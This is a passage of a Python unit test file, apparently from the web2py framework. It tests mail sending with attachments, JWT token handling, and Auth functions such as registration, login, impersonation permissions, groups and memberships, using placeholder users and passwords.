subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
TestMail.DummySMTP.inbox.pop()
def test_tls(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.tls = True
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
TestMail.DummySMTP.inbox.pop()
def test_attachment(self):
module_file = os.path.abspath(__file__)
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
message='world',
attachments=Mail.Attachment(module_file)))
message = TestMail.DummySMTP.inbox.pop()
attachment = message.parsed_payload.get_payload(1).get_payload(decode=True)
with open(module_file, 'rb') as mf:
self.assertEqual(to_bytes(attachment), to_bytes(mf.read()))
# Test missing attachment name error
stream = open(module_file)
self.assertRaises(Exception, lambda *args, **kwargs: Mail.Attachment(*args, **kwargs), stream)
stream.close()
# Test you can define content-id and content type
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
message='world',
attachments=Mail.Attachment(module_file, content_id='trololo', content_type='tra/lala')))
message = TestMail.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: tra/lala' in message.payload)
self.assertTrue('Content-Id: <trololo>' in message.payload)
# TODO: class TestAuthJWT(unittest.TestCase):
class TestAuthJWT(unittest.TestCase):
def setUp(self):
from gluon.tools import AuthJWT
from gluon import current
self.request = Request(env={})
self.request.application = 'a'
self.request.controller = 'c'
self.request.function = 'f'
self.request.folder = 'applications/admin'
self.current = current
self.current.request = self.request
self.db = DAL(DEFAULT_URI, check_reserved=['all'])
self.auth = Auth(self.db)
self.auth.define_tables(username=True, signature=False)
self.user_data = dict(username='jwtuser', password='jwtuser123')
self.db.auth_user.insert(username=self.user_data['username'],
password=str(
self.db.auth_user.password.requires[0](
self.user_data['password'])[0]))
self.jwtauth = AuthJWT(self.auth, secret_key='secret', verify_expiration=True)
def test_jwt_token_manager(self):
import gluon.serializers
self.request.vars.update(self.user_data)
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
del self.request.vars['username']
del self.request.vars['password']
self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
def test_allows_jwt(self):
import gluon.serializers
self.request.vars.update(self.user_data)
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
del self.request.vars['username']
del self.request.vars['password']
self.token = self.jwtauth.jwt_token_manager()
self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
@self.jwtauth.allows_jwt()
def optional_auth():
self.assertEqual(self.user_data['username'], self.auth.user.username)
optional_auth()
@unittest.skipIf(IS_IMAP, "TODO: Imap raises 'Connection refused'")
# class TestAuth(unittest.TestCase):
#
# def setUp(self):
# request = Request(env={})
# request.application = 'a'
# request.controller = 'c'
# request.function = 'f'
# request.folder = 'applications/admin'
# response = Response()
# session = Session()
# T = TranslatorFactory('', 'en')
# session.connect(request, response)
# from gluon.globals import current
# current.request = request
# current.response = response
# current.session = session
# current.T = T
# self.db = DAL(DEFAULT_URI, check_reserved=['all'])
# self.auth = Auth(self.db)
# self.auth.define_tables(username=True, signature=False)
# self.db.define_table('t0', Field('tt'), self.auth.signature)
# self.auth.enable_record_versioning(self.db)
# # Create a user
# self.auth.get_or_create_user(dict(first_name='Bart',
# last_name='Simpson',
# username='bart',
# email='bart@simpson.com',
# password='bart_password',
# registration_key='bart',
# registration_id=''
# ))
# # self.auth.settings.registration_requires_verification = False
# # self.auth.settings.registration_requires_approval = False
#
# def test_assert_setup(self):
# self.assertEqual(self.db(self.db.auth_user.username == 'bart').select().first()['username'], 'bart')
# self.assertTrue('auth_user' in self.db)
# self.assertTrue('auth_group' in self.db)
# self.assertTrue('auth_membership' in self.db)
# self.assertTrue('auth_permission' in self.db)
# self.assertTrue('auth_event' in self.db)
#
# def test_enable_record_versioning(self):
# self.assertTrue('t0_archive' in self.db)
#
# def test_basic_blank_forms(self):
# for f in ['login', 'retrieve_password',
# 'retrieve_username',
# # 'register' # register complain about : client_side=self.settings.client_side
# ]:
# html_form = getattr(self.auth, f)().xml()
# self.assertTrue('name="_formkey"' in html_form)
#
# # NOTE: Not sure it is the proper way to logout_bare() as there is not methods for that and auth.logout() failed
# self.auth.logout_bare()
# # self.assertTrue(self.auth.is_logged_in())
#
# for f in ['logout', 'verify_email', 'reset_password',
# 'change_password', 'profile', 'groups']:
# self.assertRaisesRegexp(HTTP, "303*", getattr(self.auth, f))
#
# self.assertRaisesRegexp(HTTP, "401*", self.auth.impersonate)
#
# try:
# for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
# 'auth_membership', 'auth_permission', 'auth_group',
# 'auth_user']:
# self.db[t].drop()
# except SyntaxError as e:
# # GAE doesn't support drop
# pass
# return
#
# def test_get_or_create_user(self):
# self.db.auth_user.insert(email='user1@test.com', username='user1', password='password_123')
# self.db.commit()
# # True case
# self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
# 'username': 'user1',
# 'password': 'password_123'
# })['username'], 'user1')
# # user2 doesn't exist yet and get created
# self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
# 'username': 'user2'})['username'], 'user2')
# # user3 for corner case
# self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
# 'last_name': 'Simpson',
# 'email': 'user3@test.com',
# 'registration_id': 'user3',
# 'username': 'user3'})['username'], 'user3')
# # False case
# self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
# self.db.auth_user.truncate()
# self.db.commit()
#
# def test_login_bare(self):
# # The following test case should succeed but failed as I never received the user record but False
# self.auth.login_bare(username='bart@simpson.com', password='bart_password')
# self.assertTrue(self.auth.is_logged_in())
# # Failing login because bad_password
# self.assertEqual(self.auth.login_bare(username='bart', password='wrong_password'), False)
# self.db.auth_user.truncate()
#
# def test_register_bare(self):
# # corner case empty register call register_bare without args
# self.assertRaises(ValueError, self.auth.register_bare)
# # failing register_bare user already exist
# self.assertEqual(self.auth.register_bare(username='bart', password='wrong_password'), False)
# # successful register_bare
# self.assertEqual(self.auth.register_bare(username='user2',
# email='user2@test.com',
# password='password_123')['username'], 'user2')
# # raise ValueError
# self.assertRaises(ValueError, self.auth.register_bare,
# **dict(wrong_field_name='user3', password='password_123'))
# # raise ValueError wrong email
# self.assertRaises(ValueError, self.auth.register_bare,
# **dict(email='user4@', password='password_123'))
# self.db.auth_user.truncate()
# self.db.commit()
#
# def test_bulk_register(self):
# self.auth.login_bare(username='bart', password='bart_password')
# self.auth.settings.bulk_register_enabled = True
# bulk_register_form = self.auth.bulk_register(max_emails=10).xml()
# self.assertTrue('name="_formkey"' in bulk_register_form)
#
# def test_change_password(self):
# self.auth.login_bare(username='bart', password='bart_password')
# change_password_form = getattr(self.auth, 'change_password')().xml()
# self.assertTrue('name="_formkey"' in change_password_form)
#
# def test_profile(self):
# self.auth.login_bare(username='bart', password='bart_password')
# profile_form = getattr(self.auth, 'profile')().xml()
# self.assertTrue('name="_formkey"' in profile_form)
#
# # def test_impersonate(self):
# # # Create a user to be impersonated
# # self.auth.get_or_create_user(dict(first_name='Omer',
# # last_name='Simpson',
# # username='omer',
# # email='omer@test.com',
# # password='password_omer',
# # registration_key='',
# # registration_id=''))
# # # Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
# # self.auth.add_group('impersonate')
# # self.auth.add_membership(user_id=1,
# # group_id=self.db(self.db.auth_user.username == 'bart'
# # ).select(self.db.auth_user.id).first().id)
# # self.auth.add_permission(group_id=self.db(self.db.auth_group.role == 'impersonate'
# # ).select(self.db.auth_group.id).first().id,
# # name='impersonate',
# # table_name='auth_user',
# # record_id=0)
# # # Bart login
# # self.auth.login_bare(username='bart', password='bart_password')
# # self.assertTrue(self.auth.is_logged_in())
# # # Bart impersonate Omer
# # omer_id = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
# # impersonate_form = self.auth.impersonate(user_id=omer_id)
# # self.assertTrue(self.auth.is_impersonating())
# # self.assertEqual(impersonate_form, 'test')
#
# # def test_impersonate(self):
# # request = Request(env={})
# # request.application = 'a'
# # request.controller = 'c'
# # request.function = 'f'
# # request.folder = 'applications/admin'
# # response = Response()
# # session = Session()
# # T = TranslatorFactory('', 'en')
# # session.connect(request, response)
# # from gluon.globals import current
# # current.request = request
# # current.response = response
# # current.session = session
# # current.T = T
# # db = DAL(DEFAULT_URI, check_reserved=['all'])
# # auth = Auth(db)
# # auth.define_tables(username=True, signature=False)
# # db.define_table('t0', Field('tt'), auth.signature)
# # auth.enable_record_versioning(db)
# # # Create a user
# # auth.get_or_create_user(dict(first_name='Bart',
# # last_name='Simpson',
# # username='bart',
# # email='bart@simpson.com',
# # password='bart_password',
# # registration_key='bart',
# # registration_id=''
# # ))
# # # Create a user to be impersonated
# # auth.get_or_create_user(dict(first_name='Omer',
# # last_name='Simpson',
# # username='omer',
# # email='omer@test.com',
# # password='password_omer',
# # registration_key='',
# # registration_id=''))
# # # Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
# # auth.add_group('impersonate')
# # auth.add_membership(user_id=1,
# # group_id=db(db.auth_user.username == 'bart'
# # ).select(db.auth_user.id).first().id)
# # auth.add_permission(group_id=db(db.auth_group.role == 'impersonate'
# # ).select(db.auth_group.id).first().id,
# # name='impersonate',
# # table_name='auth_user',
# # record_id=0)
# # # Bart login
# # auth.login_bare(username='bart', password='bart_password')
# # # Bart impersonate Omer
# # omer_id = db(db.auth_user.username == 'omer').select(db.auth_user.id).first().id
# # impersonate_form = auth.impersonate(user_id=omer_id)
# # self.assertTrue(auth.is_impersonating())
# # self.assertEqual(impersonate_form, 'test')
class TestAuth(unittest.TestCase):
def myassertRaisesRegex(self, *args, **kwargs):
if PY2:
return getattr(self, 'assertRaisesRegexp')(*args, **kwargs)
return getattr(self, 'assertRaisesRegex')(*args, **kwargs)
def setUp(self):
self.request = Request(env={})
self.request.application = 'a'
self.request.controller = 'c'
self.request.function = 'f'
self.request.folder = 'applications/admin'
self.response = Response()
self.session = Session()
T = TranslatorFactory('', 'en')
self.session.connect(self.request, self.response)
from gluon.globals import current
self.current = current
self.current.request = self.request
self.current.response = self.response
self.current.session = self.session
self.current.T = T
self.db = DAL(DEFAULT_URI, check_reserved=['all'])
self.auth = Auth(self.db)
self.auth.define_tables(username=True, signature=False)
self.db.define_table('t0', Field('tt'), self.auth.signature)
self.auth.enable_record_versioning(self.db)
self.auth.settings.registration_requires_verification = False
self.auth.settings.registration_requires_approval = False
# Create a user
# Note: get_or_create_user() doesn't seems to create user properly it better to use register_bare() and
# prevent login_bare() test from succeed. db insert the user manually not properly work either.
# Not working
# self.auth.get_or_create_user(dict(first_name='Bart',
# last_name='Simpson',
# username='bart',
# email='bart@simpson.com',
# password='bart_password',
# # registration_key=None,
# #registration_id='bart@simpson.com'
# ),
# login=False)
# Not working
# self.db.auth_user.insert(first_name='Bart',
# last_name='Simpson',
# username='bart',
# email='bart@simpson.com',
# password='bart_password')
# self.db.commit()
self.auth.register_bare(first_name='Bart',
last_name='Simpson',
username='bart',
email='bart@simpson.com',
password='bart_password')
def test_assert_setup(self):
self.assertTrue('auth_user' in self.db)
self.assertTrue('auth_group' in self.db)
self.assertTrue('auth_membership' in self.db)
self.assertTrue('auth_permission' in self.db)
self.assertTrue('auth_event' in self.db)
bart_record = self.db(self.db.auth_user.username == 'bart').select().first()
self.assertEqual(bart_record['username'], 'bart')
self.assertEqual(bart_record['registration_key'], '')
bart_id = self.db(self.db.auth_user.username == 'bart').select().first().id
bart_group_id = self.db(self.db.auth_group.role == 'user_{0}'.format(bart_id)).select().first().id
self.assertTrue(self.db((self.db.auth_membership.group_id == bart_group_id) &
(self.db.auth_membership.user_id == bart_id)).select().first())
# Just calling many form functions
def test_basic_blank_forms(self):
for f in ['login', 'retrieve_password', 'retrieve_username', 'register']:
html_form = getattr(self.auth, f)().xml()
self.assertTrue(b'name="_formkey"' in html_form)
for f in ['logout', 'verify_email', 'reset_password', 'change_password', 'profile', 'groups']:
self.myassertRaisesRegex(HTTP, "303*", getattr(self.auth, f))
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate)
try:
for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
'auth_membership', 'auth_permission', 'auth_group',
'auth_user']:
self.db[t].drop()
except SyntaxError as e:
# GAE doesn't support drop
pass
return
def test_get_vars_next(self):
self.current.request.vars._next = 'next_test'
self.assertEqual(self.auth.get_vars_next(), 'next_test')
# TODO: def test_navbar(self):
# TODO: def test___get_migrate(self):
def test_enable_record_versioning(self):
self.assertTrue('t0_archive' in self.db)
# TODO: def test_define_signature(self):
# TODO: def test_define_signature(self):
# TODO: def test_define_table(self):
def test_log_event(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
# user logged in
self.auth.log_event(description='some_log_event_description_%(var1)s',
vars={"var1": "var1"},
origin='log_event_test_1')
rtn = self.db(self.db.auth_event.origin == 'log_event_test_1'
).select(*[self.db.auth_event[f]
for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
self.assertEqual(set(rtn.items()), set({'origin': 'log_event_test_1',
'client_ip': None,
'user_id': bart_id,
'description': 'some_log_event_description_var1'}.items()))
# user not logged
self.auth.logout_bare()
self.auth.log_event(description='some_log_event_description_%(var2)s',
vars={"var2": "var2"},
origin='log_event_test_2')
rtn = self.db(self.db.auth_event.origin == 'log_event_test_2'
).select(*[self.db.auth_event[f]
for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
self.assertEqual(set(rtn.items()), set({'origin': 'log_event_test_2',
'client_ip': None,
'user_id': None,
'description': 'some_log_event_description_var2'}.items()))
# no logging tests
self.auth.settings.logging_enabled = False
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
self.auth.log_event(description='some_log_event_description_%(var3)s',
vars={"var3": "var3"},
origin='log_event_test_3')
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
self.auth.settings.logging_enabled = True
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
self.auth.log_event(description=None,
vars={"var4": "var4"},
origin='log_event_test_4')
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
# TODO: Corner case translated description...
def test_get_or_create_user(self):
self.db.auth_user.insert(email='user1@test.com', username='user1', password='password_123')
self.db.commit()
# True case
self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
'username': 'user1',
'password': 'password_123'
})['username'], 'user1')
# user2 doesn't exist yet and get created
self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
'username': 'user2'})['username'], 'user2')
# user3 for corner case
self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
'last_name': 'Simpson',
'email': 'user3@test.com',
'registration_id': 'user3',
'username': 'user3'})['username'], 'user3')
# False case
self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
self.db.auth_user.truncate()
self.db.commit()
# TODO: def test_basic(self):
# TODO: def test_login_user(self):
# TODO: def test__get_login_settings(self):
def test_login_bare(self):
self.auth.login_bare(username='bart', password='bart_password')
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
# Failing login because wrong_password
self.assertFalse(self.auth.login_bare(username='bart', password='wrong_password'))
# NOTE : The following failed for some reason, but I can't find out why
# self.auth = Auth(self.db)
# self.auth.define_tables(username=False, signature=False)
# self.auth.settings.registration_requires_verification = False
# self.auth.settings.registration_requires_approval = False
# self.auth.register_bare(first_name='Omer',
# last_name='Simpson',
# # no username field passed, failed with :
# # ValueError('register_bare: userfield not provided or invalid')
# # Or
# # username='omer',
# # Or
# # username='omer@simpson.com',
# # In either previous cases, it failed with :
# # self.assertTrue(self.auth.is_logged_in()) AssertionError: False is not true
# email='omer@simpson.com',
# password='omer_password')
# self.auth.login_bare(username='omer@sympson.com', password='omer_password')
# self.assertTrue(self.auth.is_logged_in())
def test_register_bare(self):
# corner case empty register call register_bare without args
self.assertRaises(ValueError, self.auth.register_bare)
# failing register_bare user already exist
self.assertEqual(self.auth.register_bare(username='bart', password='wrong_password'), False)
# successful register_bare
self.assertEqual(self.auth.register_bare(username='user2',
email='user2@test.com',
password='password_123')['username'], 'user2')
# raise ValueError
self.assertRaises(ValueError, self.auth.register_bare,
**dict(wrong_field_name='user3', password='password_123'))
# raise ValueError wrong email
self.assertRaises(ValueError, self.auth.register_bare,
**dict(email='user4@', password='password_123'))
self.db.auth_user.truncate()
self.db.commit()
# TODO: def test_cas_login(self):
# TODO: def test_cas_validate(self):
# TODO: def test__reset_two_factor_auth(self):
# TODO: def test_when_is_logged_in_bypass_next_in_url(self):
# TODO: def test_login(self):
# TODO: def test_logout(self):
def test_logout_bare(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
self.assertFalse(self.auth.is_logged_in())
# TODO: def test_register(self):
def test_is_logged_in(self):
self.auth.user = 'logged_in'
self.assertTrue(self.auth.is_logged_in())
self.auth.user = None
self.assertFalse(self.auth.is_logged_in())
# TODO: def test_verify_email(self):
# TODO: def test_retrieve_username(self):
def test_random_password(self):
# let just check that the function is callable
self.assertTrue(self.auth.random_password())
# TODO: def test_reset_password_deprecated(self):
# TODO: def test_confirm_registration(self):
# TODO: def test_email_registration(self):
def test_bulk_register(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.auth.settings.bulk_register_enabled = True
bulk_register_form = self.auth.bulk_register(max_emails=10).xml()
self.assertTrue(b'name="_formkey"' in bulk_register_form)
# TODO: def test_manage_tokens(self):
# TODO: def test_reset_password(self):
# TODO: def test_request_reset_password(self):
# TODO: def test_email_reset_password(self):
# TODO: def test_retrieve_password(self):
def test_change_password(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
change_password_form = getattr(self.auth, 'change_password')().xml()
self.assertTrue(b'name="_formkey"' in change_password_form)
def test_profile(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
profile_form = getattr(self.auth, 'profile')().xml()
self.assertTrue(b'name="_formkey"' in profile_form)
# TODO: def test_run_login_onaccept(self):
# TODO: def test_jwt(self):
# TODO: def test_is_impersonating(self):
def test_impersonate(self):
# Create a user to be impersonated
self.auth.get_or_create_user(dict(first_name='Omer',
last_name='Simpson',
username='omer',
email='omer@test.com',
password='password_omer',
registration_key='',
registration_id=''),
login=False)
self.db.commit()
self.assertFalse(self.auth.is_logged_in())
# Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
group_id = self.auth.add_group('impersonate')
self.auth.add_membership(user_id=self.db(self.db.auth_user.username == 'bart'
).select(self.db.auth_user.id).first().id,
group_id=group_id)
self.auth.add_permission(group_id=group_id,
name='impersonate',
table_name='auth_user',
record_id=0)
# Bart login
# self.auth.login_bare(username='bart', password='bart_password')
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.assertEqual(self.auth.user_id, bart_id)
# self.session.auth = self.auth
# self.assertTrue(self.session.auth)
# basic impersonate() test that return a read form
self.assertEqual(self.auth.impersonate().xml(),
b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="no_table_user_id__row"><td class="w2p_fl"><label class="" for="no_table_user_id" id="no_table_user_id__label">User Id: </label></td><td class="w2p_fw"><input class="integer" id="no_table_user_id" name="user_id" type="text" value="" /></td><td class="w2p_fc"></td></tr><tr id="submit_record__row"><td class="w2p_fl"></td><td class="w2p_fw"><input type="submit" value="Submit" /></td><td class="w2p_fc"></td></tr></table></form>')
# bart impersonate itself
self.assertEqual(self.auth.impersonate(bart_id), None)
self.assertFalse(self.auth.is_impersonating()) # User shouldn't impersonate itself?
# Bart impersonate Omer
omer_id = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
impersonate_form = self.auth.impersonate(user_id=omer_id)
self.assertTrue(self.auth.is_impersonating())
self.assertEqual(self.auth.user_id, omer_id) # we make it really sure
self.assertEqual(impersonate_form.xml(),
b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="auth_user_id__row"><td class="w2p_fl"><label class="readonly" for="auth_user_id" id="auth_user_id__label">Id: </label></td><td class="w2p_fw"><span id="auth_user_id">2</span></td><td class="w2p_fc"></td></tr><tr id="auth_user_first_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_first_name" id="auth_user_first_name__label">First name: </label></td><td class="w2p_fw">Omer</td><td class="w2p_fc"></td></tr><tr id="auth_user_last_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_last_name" id="auth_user_last_name__label">Last name: </label></td><td class="w2p_fw">Simpson</td><td class="w2p_fc"></td></tr><tr id="auth_user_email__row"><td class="w2p_fl"><label class="readonly" for="auth_user_email" id="auth_user_email__label">E-mail: </label></td><td class="w2p_fw">omer@test.com</td><td class="w2p_fc"></td></tr><tr id="auth_user_username__row"><td class="w2p_fl"><label class="readonly" for="auth_user_username" id="auth_user_username__label">Username: </label></td><td class="w2p_fw">omer</td><td class="w2p_fc"></td></tr></table><div style="display:none;"><input name="id" type="hidden" value="2" /></div></form>')
self.auth.logout_bare()
# Failing impersonation
# User lacking impersonate membership
self.auth.login_user(self.db(self.db.auth_user.username == 'omer').select().first()) # bypass login_bare()
# self.assertTrue(self.auth.is_logged_in()) # For developing test
# self.assertFalse(self.auth.is_impersonating()) # For developing test
self.myassertRaisesRegex(HTTP, "403*", self.auth.impersonate, bart_id)
self.auth.logout_bare()
# Try impersonate a non existing user
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
# self.assertTrue(self.auth.is_logged_in()) # For developing test
# self.assertFalse(self.auth.is_impersonating()) # For developing test
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate, 1000) # user with id 1000 shouldn't exist
# Try impersonate user with id = 0 or '0' when bart impersonating omer
self.auth.impersonate(user_id=omer_id)
self.assertTrue(self.auth.is_impersonating())
self.assertEqual(self.auth.impersonate(user_id=0), None)
# TODO: def test_update_groups(self):
def test_groups(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertEqual(self.auth.groups().xml(),
b'<table><tr><td><h3>user_1(1)</h3></td></tr><tr><td><p></p></td></tr></table>')
def test_not_authorized(self):
self.current.request.ajax = 'facke_ajax_request'
self.myassertRaisesRegex(HTTP, "403*", self.auth.not_authorized)
self.current.request.ajax = None
self.assertEqual(self.auth.not_authorized(), self.auth.messages.access_denied)
def test_allows_jwt(self):
self.myassertRaisesRegex(HTTP, "400*", self.auth.allows_jwt)
# TODO: def test_requires(self):
# def test_login(self):
# Basic testing above in "test_basic_blank_forms()" could be refined here
# TODO: def test_requires_login_or_token(self):
# TODO: def test_requires_membership(self):
# TODO: def test_requires_permission(self):
# TODO: def test_requires_signature(self):
def test_add_group(self):
self.assertEqual(self.auth.add_group(role='a_group', description='a_group_role_description'),
self.db(self.db.auth_group.role == 'a_group').select(self.db.auth_group.id).first().id)
def test_del_group(self):
bart_group_id = 1 # Should be group 1, 'user_1'
self.assertEqual(self.auth.del_group(group_id=bart_group_id), None)
def test_id_group(self):
self.assertEqual(self.auth.id_group(role='user_1'), 1)
# If role don't exist it return None
self.assertEqual(self.auth.id_group(role='non_existing_role_name'), None)
def test_user_group(self):
self.assertEqual(self.auth.user_group(user_id=1), 1)
# Bart should be user 1 and it unique group should be 1, 'user_1'
def test_user_group_role(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
user_group_role = 'user_%s' % self.db(self.db.auth_user.username == 'bart'
).select(self.db.auth_user.id).first().id
self.assertEqual(self.auth.user_group_role(), user_group_role)
self.auth.logout_bare()
# with user_id args
self.assertEqual(self.auth.user_group_role(user_id=1), 'user_1')
# test None
self.auth.settings.create_user_groups = None
self.assertEqual(self.auth.user_group_role(user_id=1), None)
def test_has_membership(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.has_membership('user_1'))
self.assertFalse(self.auth.has_membership('user_555'))
self.assertTrue(self.auth.has_membership(group_id=1))
self.auth.logout_bare()
self.assertTrue(self.auth.has_membership(role='user_1', user_id=1))
self.assertTrue(self.auth.has_membership(group_id=1, user_id=1))
# check that event is logged
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.has_membership(group_id=1, user_id=1))
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
def test_add_membership(self):
user = self.db(self.db.auth_user.username == 'bart').select().first() # bypass login_bare()
user_id = user.id
role_name = 'test_add_membership_group'
group_id = self.auth.add_group(role_name)
self.assertFalse(self.auth.has_membership(role_name))
self.auth.add_membership(group_id=group_id, user_id=user_id)
self.assertTrue(self.auth.has_membership(group_id, user_id=user_id))
self.auth.del_membership(group_id=group_id, user_id=user_id)
self.assertFalse(self.auth.has_membership(group_id, user_id=user_id))
self.auth.add_membership(role=role_name, user_id=user_id)
self.assertTrue(self.auth.has_membership(group_id, user_id=user_id))
self.auth.del_membership(group_id=group_id, user_id=user_id)
self.assertFalse(self.auth.has_membership(group_id, user_id=user_id))
with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
self.auth.add_membership(group_id='not_existing_group_name', user_id=user_id)
with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
self.auth.add_membership(role='not_existing_role_name', user_id=user_id)
with self.myassertRaisesRegex(ValueError, '^user_id not provided or invalid$'):
self.auth.add_membership(group_id=group_id, user_id=None)
with self.myassertRaisesRegex(ValueError, '^user_id not provided or invalid$'):
self.auth.add_membership(role=role_name, user_id=None)
self.auth.login_user(user)
self.auth.add_membership(group_id=group_id)
self.assertTrue(self.auth.has_membership(group_id))
self.auth.del_membership(group_id=group_id)
self.assertFalse(self.auth.has_membership(group_id))
self.auth.add_membership(role=role_name)
self.assertTrue(self.auth.has_membership(group_id))
self.auth.del_membership(group_id=group_id)
self.assertFalse(self.auth.has_membership(group_id))
# default usage (group_id=role_name)
self.auth.add_membership(role_name)
self.assertTrue(self.auth.has_membership(group_id))
self.auth.del_membership(group_id=group_id)
self.assertFalse(self.auth.has_membership(group_id))
# re-adding a membership should return the existing membership
record0_id = self.auth.add_membership(group_id)
self.assertTrue(self.auth.has_membership(group_id))
record1_id = self.auth.add_membership(group_id)
self.assertEqual(record0_id, record1_id)
self.auth.del_membership(group_id=group_id)
self.assertFalse(self.auth.has_membership(group_id))
with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
self.auth.add_membership(group_id='not_existing_group_name')
with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
self.auth.add_membership(role='not_existing_role_name')
def test_del_membership(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
user_1_role_id = self.db(self.db.auth_membership.group_id == self.auth.id_group('user_1')
).select(self.db.auth_membership.id).first().id
self.assertEqual(self.auth.del_membership('user_1'), user_1_role_id)
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
# check that event is logged
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
# not logged in test case
group_id = self.auth.add_group('some_test_group')
membership_id = self.auth.add_membership('some_test_group')
self.assertEqual(self.auth.user_groups[group_id], 'some_test_group')
self.auth.logout_bare()
# not deleted
self.assertFalse(self.auth.del_membership('some_test_group'))
self.assertEqual(set(self.db.auth_membership(membership_id).as_dict().items()),
set({'group_id': 2, 'user_id': 1, 'id': 2}.items())) # is not deleted
# deleted
bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.assertTrue(self.auth.del_membership('some_test_group', user_id=bart_id))
self.assertEqual(self.db.auth_membership(membership_id), None) # is really deleted
def test_has_permission(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.auth.add_permission(group_id=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
# True case
self.assertTrue(self.auth.has_permission(name='some_permission',
table_name='auth_user',
record_id=0,
user_id=bart_id,
group_id=self.auth.id_group('user_1')))
# False case
self.assertFalse(self.auth.has_permission(name='some_other_permission',
table_name='auth_user',
record_id=0,
user_id=bart_id,
group_id=self.auth.id_group('user_1')))
def test_add_permission(self):
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
permission_id = \
self.auth.add_permission(group_id=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
# check that event is logged
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
# True case
permission_count = \
self.db(self.db.auth_permission.id == permission_id).count()
self.assertTrue(permission_count)
# False case
permission_count = \
self.db((self.db.auth_permission.group_id == self.auth.id_group('user_1')) &
(self.db.auth_permission.name == 'no_permission') &
(self.db.auth_permission.table_name == 'no_table') &
(self.db.auth_permission.record_id == 0)).count()
self.assertFalse(permission_count)
